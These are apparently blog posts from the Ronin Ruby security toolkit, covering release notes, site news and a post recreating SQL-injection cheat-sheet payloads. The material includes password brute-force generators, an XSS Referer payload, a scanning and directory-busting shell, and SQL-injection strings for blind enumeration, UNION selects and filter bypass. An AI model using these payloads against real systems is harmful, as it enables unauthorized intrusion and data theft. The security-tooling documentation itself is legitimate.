<p>This webcast will take place from 16:00 PDT to 20:00 PDT. All Ronin webcasts are
free and requires no registration. Just go to
<a href="http://yuuguu.com/share">yuuguu.com/share</a> and join the conference-call
at <strong>1-415-363-0849</strong>, using the PIN <strong>272335</strong> for both.</p>
<p>This is the first time that we have done a Ronin webcast, and was a spur of the
moment decision. We will probably be doing more webcasts in the future, so don’t
worry if you missed the first one. ;)</p>
<p><strong>Update:</strong> The last 3rd of the webcast was <a href="http://vimeo.com/31666052">recorded</a>, although the audio
quality is not the best.</p>
ronin-support 0.3.0 and ronin 1.3.0 released2011-10-16 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2011/10/16/ronin-support-0-3-0-and-ronin-1-3-0-released.html<p>After roughly three months, new versions of <a href="http://rubygems.org/gems/ronin-support">ronin-support</a> and <a href="http://rubygems.org/gems/ronin">ronin</a>
have been released!</p>
<h2 id="upgrade">Upgrade</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ gem update ronin
</code></pre></div></div>
<h2 id="easier-text-processing">Easier Text Processing</h2>
<p><a href="http://rubydoc.info/gems/ronin-support/0.3.0/File#each_line-class_method">File.each_line</a> and <a href="http://rubydoc.info/gems/ronin-support/0.3.0/File#each_row-class_method">File.each_row</a> were added to help with processing
large text-files:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="no">File</span><span class="p">.</span><span class="nf">each_line</span><span class="p">(</span><span class="s2">"wordlist.txt"</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">word</span><span class="o">|</span>
<span class="nb">puts</span> <span class="n">word</span>
<span class="k">end</span>
<span class="no">File</span><span class="p">.</span><span class="nf">each_row</span><span class="p">(</span><span class="s2">"users_dump.txt"</span><span class="p">,</span> <span class="s1">','</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">user</span><span class="p">,</span><span class="n">pass</span><span class="o">|</span>
<span class="c1"># ...</span>
<span class="k">end</span></code></pre></figure>
<h2 id="builtin-regexps">Builtin Regexps</h2>
<p>Some common and useful <a href="https://github.com/ronin-rb/ronin-support/blob/v0.3.0/lib/ronin/extensions/regexp.rb#L22-45">Regular Expressions</a> were added to ronin-support:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">Regexp::MAC</code></li>
<li><code class="language-plaintext highlighter-rouge">Regexp::IPv4</code>, <code class="language-plaintext highlighter-rouge">Regexp::IPv6</code>, <code class="language-plaintext highlighter-rouge">Regexp::IP</code></li>
<li><code class="language-plaintext highlighter-rouge">Regexp::HOST_NAME</code></li>
<li><code class="language-plaintext highlighter-rouge">Regexp::USER_NAME</code></li>
<li><code class="language-plaintext highlighter-rouge">Regexp::EMAIL_ADDR</code></li>
</ul>
<h2 id="bruteforcing-and-fuzzing">Bruteforcing and Fuzzing</h2>
<p><a href="http://rubydoc.info/gems/ronin-support/0.3.0/String#generate-class_method">String.generate</a> was added to assist in enumerating over every possible
String, based on a format template. This method is especially useful for
bruteforcing passwords or directories. The following code enumerates through
every password starting with five alpha characters and ending in one to three
numeric characters:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="no">String</span><span class="p">.</span><span class="nf">generate</span><span class="p">([</span><span class="ss">:alpha</span><span class="p">,</span> <span class="mi">5</span><span class="p">],</span> <span class="p">[</span><span class="ss">:numeric</span><span class="p">,</span> <span class="mi">1</span><span class="o">..</span><span class="mi">3</span><span class="p">])</span> <span class="k">do</span> <span class="o">|</span><span class="n">password</span><span class="o">|</span>
<span class="nb">puts</span> <span class="n">password</span>
<span class="k">end</span></code></pre></figure>
<p><a href="http://rubydoc.info/gems/ronin-support/0.3.0/String#fuzz-instance_method">String#fuzz</a> was added to assist in fuzzing Strings. This method will find
all occurrences of a sub-string or regular expression, and replace each one
with one or more substitutions. The following code replaces every occurrence of
a number with 1 to 100 <code class="language-plaintext highlighter-rouge">9</code> characters:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="s2">"[1,2,3]"</span><span class="p">.</span><span class="nf">fuzz</span><span class="p">(</span><span class="sr">/\d+/</span> <span class="o">=></span> <span class="no">String</span><span class="p">.</span><span class="nf">generate</span><span class="p">([</span><span class="s1">'9'</span><span class="p">,</span> <span class="mi">1</span><span class="o">..</span><span class="mi">100</span><span class="p">]))</span> <span class="k">do</span> <span class="o">|</span><span class="n">str</span><span class="o">|</span>
<span class="nb">puts</span> <span class="n">str</span>
<span class="k">end</span></code></pre></figure>
<h2 id="easier-dns-queries">Easier DNS Queries</h2>
<p>Sometimes you need to query a specific DNS server, and bypass <code class="language-plaintext highlighter-rouge">/etc/hosts</code>.
Now you can, using any of the <code class="language-plaintext highlighter-rouge">lookup</code> methods:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">ip</span> <span class="o">=</span> <span class="no">IPAddr</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="s2">"209.20.85.251"</span><span class="p">)</span>
<span class="n">ip</span><span class="p">.</span><span class="nf">lookup</span><span class="p">(</span><span class="s2">"4.2.2.1"</span><span class="p">)</span>
<span class="c1"># => [#<Resolv::DNS::Name: 209-20-85-251.slicehost.net.>]</span></code></pre></figure>
<h2 id="urihttp-convenience-methods">URI::HTTP Convenience Methods</h2>
<p><code class="language-plaintext highlighter-rouge">Net.http_*</code> convenience methods were added to <a href="http://rubydoc.info/gems/ronin-support/0.3.0/URI/HTTP">URI::HTTP</a>, for quicker
access:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">url</span> <span class="o">=</span> <span class="no">URI</span><span class="p">(</span><span class="s2">"http://www.vannin.com/robots.txt"</span><span class="p">)</span>
<span class="n">url</span><span class="p">.</span><span class="nf">ok?</span>
<span class="c1"># => true</span>
<span class="n">url</span><span class="p">.</span><span class="nf">server</span>
<span class="c1"># => "Apache"</span>
<span class="n">url</span><span class="p">.</span><span class="nf">get</span>
<span class="c1"># => #<Net::HTTPOK 200 OK readbody=true></span>
<span class="n">url</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="ss">:headers</span> <span class="o">=></span> <span class="p">{</span><span class="ss">:referer</span> <span class="o">=></span> <span class="s2">"><script>alert('XSS');</script>"</span><span class="p">})</span>
<span class="c1"># => #<Net::HTTPOK 200 OK readbody=true></span></code></pre></figure>
<h2 id="roninui-moves">Ronin::UI Moves</h2>
<p><a href="http://rubydoc.info/gems/ronin-support/0.3.0/Ronin/UI/Output">Ronin::UI::Output</a> was moved out of ronin and down into ronin-support.
Now developers can use <code class="language-plaintext highlighter-rouge">print_info</code>, <code class="language-plaintext highlighter-rouge">print_warning</code> <code class="language-plaintext highlighter-rouge">print_error</code> methods
from <a href="http://rubygems.org/gems/ronin-support">ronin-support</a>:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="nb">require</span> <span class="s1">'ronin/ui/output'</span>
<span class="kp">include</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">UI</span><span class="o">::</span><span class="no">Output</span><span class="o">::</span><span class="no">Helpers</span>
<span class="n">print_info</span> <span class="s2">"Hello"</span>
<span class="n">print_error</span> <span class="s2">"Danger!"</span></code></pre></figure>
<p><a href="http://rubydoc.info/gems/ronin-support/0.3.0/Ronin/UI/Shell">Ronin::UI::Shell</a> was also moved into ronin-support and refactored.
Ronin::UI::Shell is now a Class, where commands can be defined as protected
methods:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="nb">require</span> <span class="s1">'ronin/ui/shell'</span>
<span class="k">class</span> <span class="nc">PwnShell</span> <span class="o"><</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">UI</span><span class="o">::</span><span class="no">Shell</span>
<span class="kp">protected</span>
<span class="k">def</span> <span class="nf">scan</span><span class="p">(</span><span class="n">target</span><span class="p">)</span>
<span class="no">IPAddr</span><span class="p">.</span><span class="nf">each</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">ip</span><span class="o">|</span>
<span class="k">begin</span>
<span class="n">print_info</span> <span class="s2">"%s:</span><span class="se">\t</span><span class="s2">%s"</span><span class="p">,</span> <span class="n">ip</span><span class="p">,</span> <span class="no">Net</span><span class="p">.</span><span class="nf">http_server</span><span class="p">(</span><span class="ss">:host</span> <span class="o">=></span> <span class="n">ip</span><span class="p">)</span>
<span class="k">rescue</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="k">def</span> <span class="nf">dirbust</span><span class="p">(</span><span class="n">target</span><span class="p">,</span><span class="o">*</span><span class="n">words</span><span class="p">)</span>
<span class="no">Net</span><span class="p">.</span><span class="nf">http_session</span><span class="p">(</span><span class="ss">:host</span> <span class="o">=></span> <span class="n">target</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">http</span><span class="o">|</span>
<span class="n">words</span><span class="p">.</span><span class="nf">each</span> <span class="k">do</span> <span class="o">|</span><span class="n">word</span><span class="o">|</span>
<span class="n">path</span> <span class="o">=</span> <span class="s2">"/</span><span class="si">#{</span><span class="n">word</span><span class="si">}</span><span class="s2">"</span>
<span class="k">if</span> <span class="n">http</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">path</span><span class="p">).</span><span class="nf">code</span> <span class="o">==</span> <span class="s2">"200"</span>
<span class="n">print_info</span> <span class="s2">"Found http://</span><span class="si">#{</span><span class="n">target</span><span class="si">}#{</span><span class="n">path</span><span class="si">}</span><span class="s2"> ..."</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="no">PwnShell</span><span class="p">.</span><span class="nf">start</span></code></pre></figure>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>> help
Available commands:
dirbust target [words]
exit
help
quit
scan target
</code></pre></div></div>
<h2 id="extract-and-import-methods">Extract and Import Methods</h2>
<p><code class="language-plaintext highlighter-rouge">extract</code> and <code class="language-plaintext highlighter-rouge">import</code> methods were added to <a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/MACAddress">MACAddress</a>, <a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/IPAddress">IPAddress</a>,
<a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/HostName">HostName</a>, <a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/URL">URL</a> and <a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/EmailAddress">EmailAddress</a>. <code class="language-plaintext highlighter-rouge">extract</code> can parse large
amounts of text and extract Resources from it:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="no">HostName</span><span class="p">.</span><span class="nf">extract</span><span class="p">(</span><span class="n">text</span><span class="p">)</span> <span class="p">{</span> <span class="o">|</span><span class="n">host</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">host</span> <span class="p">}</span></code></pre></figure>
<p><code class="language-plaintext highlighter-rouge">import</code> reads every line of a file and saves extracted Resources into the
Database:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="no">IPAddress</span><span class="p">.</span><span class="nf">import</span><span class="p">(</span><span class="s2">"ips.txt"</span><span class="p">)</span> <span class="p">{</span> <span class="o">|</span><span class="n">ip</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">ip</span> <span class="p">}</span></code></pre></figure>
<h2 id="inline-commands-and-tab-completion">Inline Commands and Tab-Completion</h2>
<p>The Ronin Console received some significant improvements in 1.3.0.</p>
<p>Inline Commands were added to the Ronin Console, allowing you to quickly execute
system commands. Simply prefix the command to run with a <code class="language-plaintext highlighter-rouge">!</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>> "olleh".reverse
# => "hello"
>> !ncat github.com 80
GET /
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.0.4</center>
</body>
</html>
</code></pre></div></div>
<p>New Tab Completion rules were also added, allowing you to tab-complete data
in the Database and more:</p>
<ul>
<li>
<p><a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/IPAddress">Ronin::IPAddress</a>es:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>> "192.168.<TAB><TAB>
192.168.1.1
192.168.1.52
</code></pre></div> </div>
</li>
<li>
<p><a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/HostName">Ronin::HostName</a>s:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>> "www.ex<TAB><TAB>
www.example.com
www.exploit-db.com
</code></pre></div> </div>
</li>
<li>
<p><a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/URL">Ronin::URL</a>s:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>> "http://www.victim.com/<TAB><TAB>
http://www.victim.com/index.php
http://www.victim.com/page.php?id=1
http://www.victim.com/page.php?id=2
http://www.victim.com/page.php?id=3
</code></pre></div> </div>
</li>
<li>
<p><a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/EmailAddress">Ronin::EmailAddress</a>es:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>> "alice@e<TAB><TAB>
alice@evil.com
alice@example.com
</code></pre></div> </div>
</li>
<li>
<p>Local files / directories:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>> File.read("dump.<TAB><TAB>
dump.txt
dump.csv
</code></pre></div> </div>
</li>
<li>
<p>Inline Commands:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>> !nc<TAB><TAB>
!nc
!ncat
!ncftp
</code></pre></div> </div>
</li>
</ul>
Website Redesigned2011-09-25 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2011/09/25/website-redesigned.html<p>It has been a while since the Ronin website saw major changes. I finally
got around to doing a minor redesign, with the goals of maximizing screen
real estate and better organization of content. Here are the major changes.</p>
<h2 id="svgs-ftw">SVGs FTW</h2>
<p>The first thing you will notice is the improved <a href="http://cloud.github.com/downloads/ronin-rb/art/logo.svg">logo</a>. I converted the
original PNG logo (created with <a href="http://www.gimp.org/">Gimp</a>!) into a <a href="http://en.wikipedia.org/wiki/Scalable_Vector_Graphics">Scalable Vector Graphic (SVG)</a>
using <a href="http://inkscape.org/">Inkscape</a>. The menu was also recreated as a SVG, complete with
embedded links for the menu items.</p>
<p>Now the website should properly scale without pixelation. The SVGs should
render correctly in:</p>
<ul>
<li><a href="http://www.mozilla.org/en-US/firefox/fx/">Firefox</a> >= 4</li>
<li><a href="http://www.google.com/chrome">Chrome</a> >= 11</li>
<li><a href="http://windows.microsoft.com/en-US/internet-explorer/products/ie/home">IE</a> 9</li>
</ul>
<p>Opera has known issues with rendering inline SVGs. It goes without saying, the
website will not render correctly in IE 6. :)</p>
<h2 id="blueprint-css">Blueprint CSS</h2>
<p>I also added <a href="http://www.blueprintcss.org/">Blueprint CSS</a> to the website, which should fix any
cross-browser CSS bugs and improve Typography. Blueprint also assumes the
maximum page width of 960 pixels, which allows for more content to be
displayed.</p>
<h2 id="page-moves">Page Moves</h2>
<p>Finally, the content was regrouped into four main sections:</p>
<ul>
<li><a href="/blog/">blog</a> - Project Blog.</li>
<li><a href="/faq/">faq</a> - Frequently Asked Questions.</li>
<li><a href="/docs/">docs</a> - Information for Users.</li>
<li><a href="https://github.com/ronin-rb/">code</a> - Ronin repositories on GitHub.</li>
</ul>
<p>Not to worry, the <a href="/sitemap.xml">sitemap</a> was updated and JavaScript redirects
were added to the old pages.</p>
<h2 id="bugs">Bugs</h2>
<p>If the site is not rendering correctly for you, or maybe you found a typo,
you can <a href="https://github.com/ronin-rb/ronin-rb.github.io/issues">submit a bug</a> or <a href="https://github.com/ronin-rb/ronin-rb.github.io">fork/edit the site</a> on <a href="https://github.com/signup/free">GitHub</a>.</p>
Ronin 1.0.0 prerelease2010-12-30 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2010/12/30/ronin-1-0-0-prerelease.html<p>After more than a year of development, refactoring and new
features, Ronin 1.0.0.pre1 has been released:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ gem install ronin --pre
</code></pre></div></div>
<p>Since this is a prerelease, QA testing and <a href="https://github.com/ronin-rb/ronin/issues">bug reports</a>
would be much appreciated. As bug-fixes stack up, we will release
additional prereleases for testing. Once the code stabilizes,
Release Candidates (RCs) will be released.</p>
<p>Instead of trying to release everything at once, we are following a
staggered <a href="https://github.com/ronin-rb/ronin/wiki/Release-Schedule">Release Schedule</a> split into in three phases. This allows us to get
the core libraries (<a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a>, <a href="https://github.com/ronin-rb/ronin#readme">ronin</a> and <a href="https://github.com/ronin-rb/ronin-gen#readme">ronin-gen</a>) immediately to
users.</p>
New API Documentation2010-09-01 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2010/09/01/new-api-documentation.html<p>If you have not heard yet, <a href="http://gnuu.org/">lsegal</a> and
<a href="http://blog.zerosum.org/">zapnap</a> have rolled out the new
<a href="http://rubydoc.info/">rubydoc.info</a> running
<a href="http://rubydoc.info/docs/yard/file/docs/WhatsNew.md">YARD 0.6.0</a>.</p>
<p>Not only does <code class="language-plaintext highlighter-rouge">rubydoc.info</code> look sharp, but it can
build YARD documentation for both <a href="http://rubydoc.info/gems/">RubyGems</a>
released to <a href="http://rubygems.org/">rubygems.org</a> or
<a href="http://rubydoc.info/github/">GitHub</a> repositories being actively developed.</p>
<p>We immediately leveraged <code class="language-plaintext highlighter-rouge">rubydoc.info</code> by making sure all Ronin
repositories had post-receive hooks to update their YARD documentation. Now
users can browse API documentation for both
<a href="http://rubydoc.info/github/ronin-rb/ronin/master/frames">Ronin (Edge)</a>
and previous releases of <a href="http://rubydoc.info/gems/ronin/frames">Ronin</a>.</p>
<p>Checkout the new API documentation links in the <a href="/docs/">docs</a> section.</p>
Installing Ronin (Edge) Guide2010-08-19 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2010/08/19/installing-ronin-edge-guide.html<p>We just released a new <a href="/docs/install/edge.html">tutorial</a>, aimed at
developers and users who want to run the latest changes made to Ronin.</p>
<p>The Guide also touches on using the
<a href="http://rvm.beginrescueend.com/">Ruby Version Manager (RVM)</a> to install
Ruby and using <a href="http://www.gembundler.com/">Gem Bundler</a> to install the
dependencies of Ronin. Together, RVM and Gem Bundler, allows you to easily
run the edge version of Ronin right out of your home directory!</p>
New Site2010-02-22 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2010/02/22/new-site.html<p>As listed in the <a href="/blog/2010/01/12/spring-cleaning.html">Spring Cleaning Campaign (2010)</a>, a new website has been
designed for <a href="/">Ronin</a>. The new site is <a href="https://github.com/mojombo/jekyll#readme">Jekyll</a> based and hosted on
<a href="https://github.com/ronin-rb/ronin-rb.github.io#readme">GitHub</a>.</p>
<p>Much of the website is written in <a href="http://daringfireball.net/projects/markdown/">Markdown</a>, which makes writing new content
a breeze. As always, we accept edits to the site, simply <a href="https://github.com/ronin-rb/ronin-rb.github.io/fork">fork</a> the site,
commit your changes and send one of the Ronin developers a pull-request.</p>
<p>You’ll probably notice that we also added a few new sections to the site.
The <a href="/">front page</a> now shows three random examples pulled from the <a href="/examples/">Examples</a>
section, illustrating some of the things Ronin can do in a few lines.
One can even subscribe to an <a href="/examples/atom.xml">Atom feed</a> of the Examples, to get the latest
tricks.</p>
<p>The <a href="/downloads/">Downloads</a> link in the menu now points to an actual downloads page,
containing links to <code class="language-plaintext highlighter-rouge">.tar.gz</code>, <code class="language-plaintext highlighter-rouge">.zip</code> and <code class="language-plaintext highlighter-rouge">.gem</code> files of Ronin.</p>
<p>Lastly, Ronin now has a <a href="/blog/">Developer Blog</a> with <a href="http://disqus.com/">DISQUS</a> powered comments.</p>
RSnakes SQLi Cheat Sheet using Ronin SQL2010-02-05 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2010/02/05/rsnakes-sqli-cheat-sheet-using-ronin-sql.html<p>One of the planned features listed in the <a href="/blog/2010/01/12/spring-cleaning.html">Spring Cleaning Campaign (2010)</a>
was a simple Ruby->SQL encoder for the <a href="https://github.com/ronin-rb/ronin-sql#readme">Ronin SQL</a> library,
to replace the overly complex Ronin SQL DSL. This encoder would format
Ruby Integers, Strings, Arrays and Hashes into fragments of proper SQL.</p>
<p>The Ruby->SQL encoder has gotten to the point of being able to recreate most of
the examples from <a href="http://ha.ckers.org/sqlinjection/">RSnake’s SQL Injection Cheat Sheet</a>:</p>
<p>Load <code class="language-plaintext highlighter-rouge">ronin/code/sql</code>:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="nb">require</span> <span class="s1">'ronin/code/sql'</span>
<span class="kp">include</span> <span class="no">Ronin</span>
<span class="n">sql</span> <span class="o">=</span> <span class="no">Code</span><span class="p">.</span><span class="nf">sql</span></code></pre></figure>
<p>Normal SQL Injection:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sql</span><span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:or</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="ss">:eq</span><span class="p">,</span> <span class="mi">1</span><span class="p">].</span><span class="nf">to_sql</span>
<span class="c1"># => "1 or 1 = 1"</span></code></pre></figure>
<p>Normal SQL Injection using encapsulated data:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sql</span><span class="p">[</span><span class="s1">'1'</span><span class="p">,</span> <span class="ss">:or</span> <span class="s1">'1'</span><span class="p">,</span> <span class="ss">:eq</span><span class="p">,</span> <span class="s1">'1'</span><span class="p">].</span><span class="nf">to_sql</span>
<span class="c1"># => "'1' or '1' = '1'"</span></code></pre></figure>
<p>Blind SQL Injection creating an error using EXEC:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sql</span><span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:exec</span><span class="p">,</span> <span class="ss">:sp_</span><span class="p">,</span> <span class="p">[</span><span class="n">sql</span><span class="p">[</span><span class="ss">:or</span><span class="p">,</span> <span class="ss">:exec</span><span class="p">,</span> <span class="ss">:xp_</span><span class="p">]]].</span><span class="nf">to_sql</span>
<span class="c1"># => "1 exec sp_ (or exec xp_)"</span></code></pre></figure>
<p>Blind SQL Injection detection:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sql</span><span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:and</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="ss">:eq</span><span class="p">,</span> <span class="mi">1</span><span class="p">].</span><span class="nf">to_sql</span>
<span class="c1"># => "1 and 1 = 1"</span></code></pre></figure>
<p>Blind SQL Injection to attempt to locate <code class="language-plaintext highlighter-rouge">table_name</code> by brute-force
iteration through table name permutations:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sql</span><span class="p">[</span><span class="s1">'1'</span><span class="p">,</span> <span class="ss">:and</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="ss">:eq</span><span class="p">,</span> <span class="p">[</span><span class="n">sql</span><span class="p">[</span><span class="ss">:select</span><span class="p">,</span> <span class="n">sql</span><span class="p">.</span><span class="nf">count</span><span class="p">(</span><span class="ss">:all</span><span class="p">),</span> <span class="ss">:from</span><span class="p">,</span> <span class="ss">:table_name</span><span class="p">]]].</span><span class="nf">to_sql</span>
<span class="c1"># => "'1' and 1 = (select count(*) from tablenames)"</span></code></pre></figure>
<p>Using the <code class="language-plaintext highlighter-rouge">USER_NAME()</code> function in SQL Server to tell us if the user is
running as the administrator:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sql</span><span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:and</span><span class="p">,</span> <span class="n">sql</span><span class="p">.</span><span class="nf">user_name</span><span class="p">(),</span> <span class="ss">:eq</span><span class="p">,</span> <span class="s1">'dbo'</span><span class="p">].</span><span class="nf">to_sql</span>
<span class="c1"># => "1 and user_name() = 'dbo'"</span></code></pre></figure>
<p>Creating errors by calling non-existant tables:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sql</span><span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:and</span><span class="p">,</span> <span class="ss">:non_existant_table</span><span class="p">,</span> <span class="ss">:eq</span><span class="p">,</span> <span class="s1">'1'</span><span class="p">].</span><span class="nf">to_sql</span>
<span class="c1"># => "1 and non_existant_table = '1'"</span></code></pre></figure>
<p>Dumping usernames:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sql</span><span class="p">[</span><span class="ss">:or</span><span class="p">,</span> <span class="ss">:username</span><span class="p">,</span> <span class="ss">:is</span><span class="p">,</span> <span class="ss">:not</span><span class="p">,</span> <span class="kp">nil</span><span class="p">,</span> <span class="ss">:or</span><span class="p">,</span> <span class="ss">:username</span><span class="p">,</span> <span class="ss">:eq</span><span class="p">].</span><span class="nf">to_sql</span>
<span class="c1"># => "or username is not null or username ="</span></code></pre></figure>
<p>Enumerating through database table names:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sql</span><span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:and</span><span class="p">,</span> <span class="n">sql</span><span class="p">.</span><span class="nf">ascii</span><span class="p">(</span>
<span class="n">sql</span><span class="p">.</span><span class="nf">lower</span><span class="p">(</span>
<span class="n">sql</span><span class="p">.</span><span class="nf">substring</span><span class="p">(</span>
<span class="p">[</span><span class="n">sql</span><span class="p">[</span><span class="ss">:select</span><span class="p">,</span> <span class="ss">:top</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="ss">:name</span><span class="p">,</span> <span class="ss">:from</span><span class="p">,</span> <span class="ss">:sysObjects</span><span class="p">,</span> <span class="ss">:where</span><span class="p">,</span> <span class="ss">:xtype</span><span class="p">,</span> <span class="ss">:eq</span><span class="p">,</span> <span class="s1">'U'</span><span class="p">]],</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span>
<span class="p">)</span>
<span class="p">)</span>
<span class="p">),</span> <span class="ss">:gt</span><span class="p">,</span> <span class="mi">116</span><span class="p">].</span><span class="nf">to_sql</span>
<span class="c1"># => "1 and ascii(lower(substring((select top 1 name from sysobjects where xtype = 'U'),1,1))) > 116"</span></code></pre></figure>
<p>Finding user supplied tables using the <code class="language-plaintext highlighter-rouge">sysObjects</code> table in SQL Server:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sql</span><span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:union</span><span class="p">,</span> <span class="ss">:all</span><span class="p">,</span> <span class="ss">:select</span><span class="p">,</span> <span class="p">[</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">6</span><span class="p">,</span><span class="ss">:name</span><span class="p">],</span> <span class="ss">:from</span><span class="p">,</span> <span class="ss">:sysObjects</span><span class="p">,</span> <span class="ss">:where</span><span class="p">,</span> <span class="ss">:xtype</span><span class="p">,</span> <span class="ss">:eq</span><span class="p">,</span> <span class="s1">'U'</span><span class="p">].</span><span class="nf">to_sql</span>
<span class="c1"># => "1 union * select (1,2,3,4,5,6,name) from sysObjects where xtype = 'U'"</span></code></pre></figure>
<p>Bypassing filter using <code class="language-plaintext highlighter-rouge">/**/</code> instead of spaces:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">stmt</span> <span class="o">=</span> <span class="n">sql</span><span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="ss">:union</span><span class="p">,</span> <span class="ss">:select</span><span class="p">,</span> <span class="ss">:all</span><span class="p">,</span> <span class="ss">:from</span><span class="p">,</span> <span class="ss">:where</span><span class="p">]</span>
<span class="n">stmt</span><span class="p">.</span><span class="nf">to_sql</span>
<span class="c1"># => "1 union select * from where"</span>
<span class="n">stmt</span><span class="p">.</span><span class="nf">to_sql</span><span class="p">(</span><span class="ss">:spaces</span> <span class="o">=></span> <span class="kp">false</span><span class="p">)</span>
<span class="c1"># => "1/**/union/**/select/**/*/**/from/**/where"</span></code></pre></figure>
<div class="note">
<p>
I cheated a little by leaving off the prefix/suffix tick-marks used in
SQL injections, but you get the general idea.
</p>
</div>
<p>New SQL fragments are created using the <code class="language-plaintext highlighter-rouge">sql[...]</code> syntax, and new SQL
function calls are created with <code class="language-plaintext highlighter-rouge">sql.func_name</code>. Note, that you can nest
SQL fragments by using the <code class="language-plaintext highlighter-rouge">[sql[...]]</code> or <code class="language-plaintext highlighter-rouge">[sql.func_name(....)]</code> syntax.</p>
Introducing ronin-support2010-02-04 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2010/02/04/introducing-ronin-support.html<p>One of the things that recently came up during the
<a href="/blog/2010/01/12/spring-cleaning.html">Spring Cleaning Campaign (2010)</a> was that the <a href="https://github.com/ronin-rb/ronin#readme">ronin</a> repository had
become heavy with convenience methods. So it was decided to split the
convenience methods out of the ronin repository, and create a new
Ronin library just for support code.</p>
<p>Introducing <a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a>, a support library for Ronin. ronin-support
contains many of the convenience methods used by Ronin and additional libraries.
The ronin-support library also allows other projects to leverage Ronin
convenience methods, without needing the other dependencies of Ronin.</p>
